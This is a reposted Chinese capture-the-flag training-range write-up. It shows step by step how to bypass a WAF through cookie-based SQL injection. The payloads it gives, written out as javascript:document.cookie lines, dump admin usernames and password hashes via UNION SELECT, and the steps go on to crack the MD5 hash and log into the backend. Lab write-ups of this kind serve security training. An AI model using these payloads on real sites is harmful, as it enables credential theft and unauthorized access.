公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!
Posted joker-vip
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!相关的知识,希望对你有一定的参考价值。
1.打开靶场,随便点击一个页面,带参数,猜想sql注入,单引号判断,弹出警告
2.看提示,and也不能用了,先用order by暴字段数,order by 10返回正常,order by 11报错,有10个字段数
3.union select也不能用,猜想是cookie注入,把参数id=169去掉后访问,报错
4.地址栏输入 javascript:alert(document.cookie="id="+escape("169")); 弹出对话框
5.再次访问http://117.167.136.245:10181/shownews.asp? 返回正常
6.再次验证了是cookie注入,构造语句暴出位置,并猜解表名,说明存在admin这个表
javascript:alert(document.cookie="id="+escape("169+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"));
7.访问查看
8.继续,猜解字段和暴值,
javascript:alert(document.cookie="id="+escape("169+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"));
9.查看
10.MD5解密得
11.登录后台
12.得到flag
以上是关于公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!的主要内容,如果未能解决你的问题,请参考以下文章
封神台靶场:第五章:进击!拿到Web最高权限!配套课时:绕过防护上传木马实战演练